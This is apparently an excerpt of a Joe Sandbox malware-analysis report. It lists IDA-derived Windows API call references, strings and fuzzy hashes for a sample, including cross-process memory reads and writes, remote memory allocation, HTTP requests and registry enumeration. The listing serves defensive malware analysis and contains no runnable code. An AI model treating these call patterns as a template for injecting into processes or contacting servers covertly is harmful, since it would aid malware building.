                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                      • String ID: 0
                                                      • API String ID: 4152858687-4108050209
                                                      • Opcode ID: 0f6ec71317ca0224e00c3f13dce5b60fec949b458e725b841eecc234d1c1dd78
                                                      • Instruction ID: 5c4aaed3719e3d08e0e102a97ee27ad980e1ae13d35817533da0b717efcc37fd
                                                      • Opcode Fuzzy Hash: 0f6ec71317ca0224e00c3f13dce5b60fec949b458e725b841eecc234d1c1dd78
                                                      • Instruction Fuzzy Hash: 8651E1715083029BD7A4DF28D8956AFBBE6EF85314F640A2DF881D32D1DB70CC448B56
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: _memmove$_free
                                                      • String ID: 3c_$__
                                                      • API String ID: 2620147621-43384800
                                                      • Opcode ID: 264de301de54232d11e2da2105871f26cb9b631f60db04627cbe5b119a73fbcf
                                                      • Instruction ID: fd7f7fe6404512aa97b29ebb4d1439ea36663e7bc2adb43eba2199897138d21e
                                                      • Opcode Fuzzy Hash: 264de301de54232d11e2da2105871f26cb9b631f60db04627cbe5b119a73fbcf
                                                      • Instruction Fuzzy Hash: CC516C716087458FEB65CF28C444B6BBBE5FF85310F04492DEA89973A1EB35E901CB52
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: _memset$_memmove
                                                      • String ID: 3c_$ERCP
                                                      • API String ID: 2532777613-1852502410
                                                      • Opcode ID: 514c525a0af44277f67cf3cbd8b8f6843bc9b88b49bb41a9a33fd99cd0b58273
                                                      • Instruction ID: 3d7d2b6f4b62717a42f63351a7fa2f1e2ef6ae3920210065440e53423aab000a
                                                      • Opcode Fuzzy Hash: 514c525a0af44277f67cf3cbd8b8f6843bc9b88b49bb41a9a33fd99cd0b58273
                                                      • Instruction Fuzzy Hash: 1251907190070ADBDB24CF55C8857ABBBF5FF04304F20496EE54AC7281E774AA44CB90
                                                      APIs
                                                      • GetWindowRect.USER32(00CBDAD0,?), ref: 00669863
                                                      • ScreenToClient.USER32(00000002,00000002), ref: 00669896
                                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00669903
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Window$ClientMoveRectScreen
                                                      • String ID: @U=u
                                                      • API String ID: 3880355969-2594219639
                                                      • Opcode ID: e251d9c2bd0ebdecb3f6bd36e37cbdc4c51b1f917d5c130cfe330883e9389233
                                                      • Instruction ID: bad7fc5dcce2e0b8d54e21c2457a2d393c979a76e9e0343a54ab08ffc8ac57c2
                                                      • Opcode Fuzzy Hash: e251d9c2bd0ebdecb3f6bd36e37cbdc4c51b1f917d5c130cfe330883e9389233
                                                      • Instruction Fuzzy Hash: FB514D34A00209AFCB14DF14D984AEE7BBAFF46360F14865DF8659B3A0D731AD41CBA0
                                                      APIs
                                                        • Part of subcall function 006414BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00639296,?,?,00000034,00000800,?,00000034), ref: 006414E6
                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0063983F
                                                        • Part of subcall function 00641487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,006392C5,?,?,00000800,?,00001073,00000000,?,?), ref: 006414B1
                                                        • Part of subcall function 006413DE: GetWindowThreadProcessId.USER32(?,?), ref: 00641409
                                                        • Part of subcall function 006413DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0063925A,00000034,?,?,00001004,00000000,00000000), ref: 00641419
                                                        • Part of subcall function 006413DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0063925A,00000034,?,?,00001004,00000000,00000000), ref: 0064142F
                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 006398AC
                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 006398F9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                      • String ID: @$@U=u
                                                      • API String ID: 4150878124-826235744
                                                      • Opcode ID: dd20588cf684fb69de79ff15309144f9402ff2ae4837f04e1ea7c81428814adf
                                                      • Instruction ID: aaef264c9ea2e2b5144c4a9efcc7af24ac57f35bb6967f32c04139b8f160fcd9
                                                      • Opcode Fuzzy Hash: dd20588cf684fb69de79ff15309144f9402ff2ae4837f04e1ea7c81428814adf
                                                      • Instruction Fuzzy Hash: A241307690011CBFDB10DFA4CC85ADEBBB9EB46300F044159FA55B7191DA716E85CFA0
                                                      APIs
                                                      • _memset.LIBCMT ref: 006427C0
                                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 006427DC
                                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 00642822
                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,006A5890,00000000), ref: 0064286B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Menu$Delete$InfoItem_memset
                                                      • String ID: 0
                                                      • API String ID: 1173514356-4108050209
                                                      • Opcode ID: 2e21d18d1d5a96a4c1d8137c008c3961451dece79e0221dc3a88de7ecd07cbd5
                                                      • Instruction ID: c03cab32bd502113a7fa9899ed5e8d57b1d36c4abb854b222f19aaf04b8688b8
                                                      • Opcode Fuzzy Hash: 2e21d18d1d5a96a4c1d8137c008c3961451dece79e0221dc3a88de7ecd07cbd5
                                                      • Instruction Fuzzy Hash: 6E41C0702043429FD724DF24C894B5ABBEAEF85310F64496DF8A697391DB70A809CB56
                                                      APIs
                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 006688DE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: InvalidateRect
                                                      • String ID: @U=u
                                                      • API String ID: 634782764-2594219639
                                                      • Opcode ID: b34e4a22e22092d5d692e246606d487a4b5aba4880e92f3efeefc94ebb15342e
                                                      • Instruction ID: 0cde62f1a6f994bc85e2de75255579aabdee41df8097850bfdc2ad90eeff9f9b
                                                      • Opcode Fuzzy Hash: b34e4a22e22092d5d692e246606d487a4b5aba4880e92f3efeefc94ebb15342e
                                                      • Instruction Fuzzy Hash: 08319034600108BEEB249B78DC49BFC7BA7EB06310F544716FA56E72A1CA70ED409B92
                                                      APIs
                                                      • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0065D7C5
                                                        • Part of subcall function 005E784B: _memmove.LIBCMT ref: 005E7899
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: BuffCharLower_memmove
                                                      • String ID: cdecl$none$stdcall$winapi
                                                      • API String ID: 3425801089-567219261
                                                      • Opcode ID: dbe8c2d2172ebf91b309e751e26eadfce60a63527a0bf3a5c60eacc25b52331b
                                                      • Instruction ID: 1543712db221c11096c3e6ed4c100f670a761864f6c884f7b8bf49268f54928c
                                                      • Opcode Fuzzy Hash: dbe8c2d2172ebf91b309e751e26eadfce60a63527a0bf3a5c60eacc25b52331b
                                                      • Instruction Fuzzy Hash: 5431C171A0420AABDF14EF58CC419EEB7B6FF54320F008629E865977D1DB31AD09CB80
                                                      APIs
                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0065184C
                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00651872
                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 006518A2
                                                      • InternetCloseHandle.WININET(00000000), ref: 006518E9
                                                        • Part of subcall function 00652483: GetLastError.KERNEL32(?,?,00651817,00000000,00000000,00000001), ref: 00652498
                                                        • Part of subcall function 00652483: SetEvent.KERNEL32(?,?,00651817,00000000,00000000,00000001), ref: 006524AD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                      • String ID:
                                                      • API String ID: 3113390036-3916222277
                                                      • Opcode ID: e0c67f77bd317bf6c8ddda490ddc301b0664aa0ecb1fd32a79191a3a78f11cfc
                                                      • Instruction ID: 78f81590262143583b99ec243089745cf1eff997491ce5ab7e73aba9bfefaf41
                                                      • Opcode Fuzzy Hash: e0c67f77bd317bf6c8ddda490ddc301b0664aa0ecb1fd32a79191a3a78f11cfc
                                                      • Instruction Fuzzy Hash: 6221C2B5500308BFEB219F60DC85FBF77EEEB4A746F10412AF8059A240DB608E0957A4
                                                      APIs
                                                        • Part of subcall function 005E1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 005E1D73
                                                        • Part of subcall function 005E1D35: GetStockObject.GDI32(00000011), ref: 005E1D87
                                                        • Part of subcall function 005E1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 005E1D91
                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00666461
                                                      • LoadLibraryW.KERNEL32(?), ref: 00666468
                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0066647D
                                                      • DestroyWindow.USER32(?), ref: 00666485
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                      • String ID: SysAnimate32
                                                      • API String ID: 4146253029-1011021900
                                                      • Opcode ID: be0561dab567940e1d30f3814345ac150e47a4feef570284ad2837d76543629e
                                                      • Instruction ID: d4a7a6db695721f5ef0e312e3e8448d9935a034b4fcc24c7c7bfc5ec69e46f3b
                                                      • Opcode Fuzzy Hash: be0561dab567940e1d30f3814345ac150e47a4feef570284ad2837d76543629e
                                                      • Instruction Fuzzy Hash: BC216D71200205BFEF108F64EC84EBB77EEEB59368F109629FA50922A0DB71DC5197A0
                                                      APIs
                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00646DBC
                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00646DEF
                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00646E01
                                                      • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00646E3B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: CreateHandle$FilePipe
                                                      • String ID: nul
                                                      • API String ID: 4209266947-2873401336
                                                      • Opcode ID: 77962d261891d20c03b1f387192e51714ce085bbec1431d3e89a834b1e431af7
                                                      • Instruction ID: 73ff8c116b648bd8f07941490aaa85e7e6e764cd2c864743b2cb7d706c144905
                                                      • Opcode Fuzzy Hash: 77962d261891d20c03b1f387192e51714ce085bbec1431d3e89a834b1e431af7
                                                      • Instruction Fuzzy Hash: 5421A474A00209ABDB209F69DC44ADA7BFAFF46720F204629FCA1D73D0D7709951CB56
                                                      APIs
                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00646E89
                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00646EBB
                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00646ECC
                                                      • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00646F06
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: CreateHandle$FilePipe
                                                      • String ID: nul
                                                      • API String ID: 4209266947-2873401336
                                                      • Opcode ID: 5d54fe8fa70c2abf15825e98929b01deef2eba9dfece0692bf4f531dbcc06a92
                                                      • Instruction ID: 37517c2438f32de1b41dca3d81573e304118e337b1fe34d0729b9050f47f5bec
                                                      • Opcode Fuzzy Hash: 5d54fe8fa70c2abf15825e98929b01deef2eba9dfece0692bf4f531dbcc06a92
                                                      • Instruction Fuzzy Hash: BD21D079604305DBDB209F69DC44AAA77EAEF46724F200A19FCA0D73D0DB70A945CB12
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 0064AC54
                                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0064ACA8
                                                      • __swprintf.LIBCMT ref: 0064ACC1
                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000,0066F910), ref: 0064ACFF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$InformationVolume__swprintf
                                                      • String ID: %lu
                                                      • API String ID: 3164766367-685833217
                                                      • Opcode ID: 36ae9c3664e38f571d495b2863cff9421d70e89565c9352edb56314b5a0cda58
                                                      • Instruction ID: b4e5b45a86f4f443482c516bdbec2c49c8c08e26a972f242c3cf8db7daa10fe6
                                                      • Opcode Fuzzy Hash: 36ae9c3664e38f571d495b2863cff9421d70e89565c9352edb56314b5a0cda58
                                                      • Instruction Fuzzy Hash: B8218030A00149AFCB50DFA5D985DEEBBB9FF89314B004069F909EB352DB71EA45CB61
                                                      APIs
                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0063FCED,?,00640D40,?,00008000), ref: 0064115F
                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0063FCED,?,00640D40,?,00008000), ref: 00641184
                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0063FCED,?,00640D40,?,00008000), ref: 0064118E
                                                      • Sleep.KERNEL32(?,?,?,?,?,?,?,0063FCED,?,00640D40,?,00008000), ref: 006411C1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: CounterPerformanceQuerySleep
                                                      • String ID: @d
                                                      • API String ID: 2875609808-1890226142
                                                      • Opcode ID: b82929fb7399f26f55ba69fb4c7603360005287f4bbf0bc46e13b7cb79dd6252
                                                      • Instruction ID: 7c4c92e2a3a5c4ae61cb61a6b7f52e61d296e155ff6fada053a5f4cfc8b260a6
                                                      • Opcode Fuzzy Hash: b82929fb7399f26f55ba69fb4c7603360005287f4bbf0bc46e13b7cb79dd6252
                                                      • Instruction Fuzzy Hash: D9113C31D0051DD7CF009FA5E948AEEFB7AFF0A751F004466EA41BB240DB709590CBA5
                                                      APIs
                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0065EC07
                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0065EC37
                                                      • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0065ED6A
                                                      • CloseHandle.KERNEL32(?), ref: 0065EDEB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                      • String ID:
                                                      • API String ID: 2364364464-0
                                                      • Opcode ID: 92bbf6ad41d15faab0954f85ec6ce3475cbef5ecf93f92e006b2604978e7595a
                                                      • Instruction ID: 25b42d667efe13d763076e42715ff512ffe038bec64bf33bc6ad9f169fa37bc4
                                                      • Opcode Fuzzy Hash: 92bbf6ad41d15faab0954f85ec6ce3475cbef5ecf93f92e006b2604978e7595a
                                                      • Instruction Fuzzy Hash: 6F8193716043019FDB24EF29C846F6ABBE5BF84710F04891DF999DB392DAB1AD44CB81
                                                      APIs
                                                        • Part of subcall function 005E7DE1: _memmove.LIBCMT ref: 005E7E22
                                                        • Part of subcall function 00660E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0065FDAD,?,?), ref: 00660E31
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006600FD
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0066013C
                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00660183
                                                      • RegCloseKey.ADVAPI32(?,?), ref: 006601AF
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 006601BC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                      • String ID:
                                                      • API String ID: 3440857362-0
                                                      • Opcode ID: 6896ff9379c0f0857ae6eeb338944a9f7b2acf18731968852fca5d929a6ca57c
                                                      • Instruction ID: 37c131cd28c23983ea3a6452bf4d36eeda18e9ffd81eedadab43f6ebb817e581
                                                      • Opcode Fuzzy Hash: 6896ff9379c0f0857ae6eeb338944a9f7b2acf18731968852fca5d929a6ca57c
                                                      • Instruction Fuzzy Hash: 71518D31208245AFD704EF94CC85EABBBEAFF85314F00492DF595872A2DB31E905CB52
                                                      APIs
                                                        • Part of subcall function 005E9837: __itow.LIBCMT ref: 005E9862
                                                        • Part of subcall function 005E9837: __swprintf.LIBCMT ref: 005E98AC
                                                      • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0065D927
                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 0065D9AA
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0065D9C6
                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 0065DA07
                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0065DA21
                                                        • Part of subcall function 005E5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00647896,?,?,00000000), ref: 005E5A2C
                                                        • Part of subcall function 005E5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00647896,?,?,00000000,?,?), ref: 005E5A50
